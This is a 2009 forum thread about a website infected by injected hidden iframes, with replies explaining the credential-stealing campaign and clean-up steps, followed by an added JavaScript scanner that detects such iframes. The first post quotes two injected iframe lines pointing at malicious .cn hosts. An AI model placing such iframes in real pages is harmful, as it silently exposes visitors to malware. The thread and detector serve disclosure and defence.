06-06-2009, 03:29 PM | #1
Ashif
Protection from JavaScript Injection

Hi,
I want to ask whether it is possible that, using JavaScript injection, the contents of a web page can be altered (added / edited / deleted) in the lines of code.

Since this has happened to me a couple of times,

talking to the support team at my hosting provider, they say that it's due to security holes in the coding, but I think that it's a security issue on the hosting side (since the web pages' code is being modified).

I've found this code immediately after the opening of the body tag:

Code:
<iframe src="http://hugetoplocate.cn:8080/index.php" width=153 height=198 style="visibility: hidden"></iframe>
Earlier the page snoofing for the above URL was working, but now it's not producing any output (so I cannot post what's inside it).

My other website (hosted by the same provider) is also infected. There the code immediately after the body tag is:

Code:
<iframe src="http://globalnameshop.cn:8080/index.php" width=129 height=112 style="visibility: hidden"></iframe>
Again the page snoofing yields no output, with the error:

Quote:
No such page found. Please verify that page URL and try again
I need guidelines regarding its solution and more information.

Thanking in anticipation.
__________________
http://www.visititech.com
06-06-2009, 03:33 PM | #2
Philip M
Yes, it is indeed possible, but the problem is with the server and your ISP who has not implemented appropriate security measures to prevent this.

Google for more information but an example is:-

http://en.wikipedia.org/wiki/Code_injection

Change your passwords!

Last edited by Philip M; 06-06-2009 at 03:42 PM..
06-06-2009, 03:44 PM | #3
Ashif
well, thanks,

but the examples shown there do not tell how the JavaScript attack can modify the page contents. It's all about changing cookies and form data.

I've uploaded my website several times, but I think my web's in a hackers' directory, and my site got attacked again and again.
06-06-2009, 03:51 PM | #4
Philip M
You don't care how it is done - you want to prevent it from happening at all.

Change your host!
06-08-2009, 04:13 AM | #5
Norv
It seems that the problem you're having has been a huge web attack last month, affecting many sites. The .cn links, loaded in iframes, contain (or execute scripts that ultimately result in) malicious code, including a Trojan and keylogger that gets on visitors' computers, including the computers of forum administrators, like myself, like yourself, and steals their FTP passwords. Thus next time, after you clean the code, the malicious users log in with your credentials and change it back.

Please take a look at:
http://blog.unmaskparasites.com/2009.../#comment-1201

http://garwarner.blogspot.com/2009/0...d-domains.html

Or, a number of recommendations from Sophos Labs, who name this particular type of malware Troj/JSRedir-R:
http://www.sophos.com/blogs/sophoslabs/v/post/4422.

Good luck!
Users who have thanked Norv for this post:
Ashif (06-11-2009)
06-09-2009, 08:35 AM | #6
Ashif
thanks..

A reply from my hosting provider's support team:

Quote:
No matter whether you display a single line or a sophisticated page, JavaScript/iFrame injection has nothing to do with this. Instead of denying, I would suggest you study these injections. Do not use any software like Plesk, DreamWeaver, Publisher, FP...etc for your pages, as they use standard html tags while the current web situation forces you to write a secure script instead of using these simple programs.

..the current web situation forces you to write a secure script instead of using these simple programs...


What does this mean?
__________________
http://www.visititech.com
06-09-2009, 09:07 AM | #7
Philip M
No idea. Total chomp.

Change your ISP host ASAP!

But in the short term:-
Take the site down to protect other Internet users.
Replace the contents of the site with a known clean backup.
Change all passwords on the site (including FTP credentials).
Patch all the site's software.
Reload the site.

Get anti-virus software such as avast.

Last edited by Philip M; 06-09-2009 at 09:32 AM..
Users who have thanked Philip M for this post:
Ashif (06-11-2009)
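
A check that fits the clean-up steps above and the hidden-iframe pattern from the first post, as an added example that is not part of the thread: it scans a page's HTML for iframes that are hidden and load from a host outside an allow-list. ALLOWED_HOSTS, the function names and both sample pages are constructed for illustration.

```javascript
// Added example. ALLOWED_HOSTS and both sample pages are constructed.
const ALLOWED_HOSTS = new Set(["www.example.org", "player.example.org"]);

// Parse one tag's attributes into a lower-cased name -> value map.
function parseAttrs(tag) {
  const attrs = {};
  const re = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(tag)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// Hidden by CSS, or collapsed to a 0/1 pixel box.
function isHidden(attrs) {
  const style = (attrs.style || "").toLowerCase().replace(/\s+/g, "");
  if (style.includes("visibility:hidden") || style.includes("display:none")) return true;
  const tiny = (v) => v !== undefined && parseInt(v, 10) <= 1;
  return tiny(attrs.width) || tiny(attrs.height);
}

// Return every hidden iframe whose src points at a host outside the allow-list.
function findSuspiciousIframes(html) {
  const findings = [];
  const body = /<body\b[^>]*>/i.exec(html);
  const bodyEnd = body ? body.index + body[0].length : -1;
  const re = /<iframe\b[^>]*>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const attrs = parseAttrs(m[0]);
    let host = null;
    try { host = new URL(attrs.src).hostname; } catch { /* relative or missing src */ }
    if (host === null || ALLOWED_HOSTS.has(host) || !isHidden(attrs)) continue;
    // The thread's injections sat directly after the opening body tag.
    const afterBody = bodyEnd >= 0 && html.slice(bodyEnd, m.index).trim() === "";
    findings.push({ src: attrs.src, host, afterBody });
  }
  return findings;
}

const infectedPage = '<html><body>\n<iframe src="http://injected.example:8080/index.php" ' +
  'width=153 height=198 style="visibility: hidden"></iframe>\n<h1>Home</h1></body></html>';
const cleanPage = '<html><body><h1>Video</h1><iframe src="http://player.example.org/embed/1" ' +
  'width=640 height=360></iframe></body></html>';

console.log(findSuspiciousIframes(infectedPage));
console.log(findSuspiciousIframes(cleanPage));
```

Running it over every file of the restored site, and again some days later, shows whether the injection has come back after the passwords were changed.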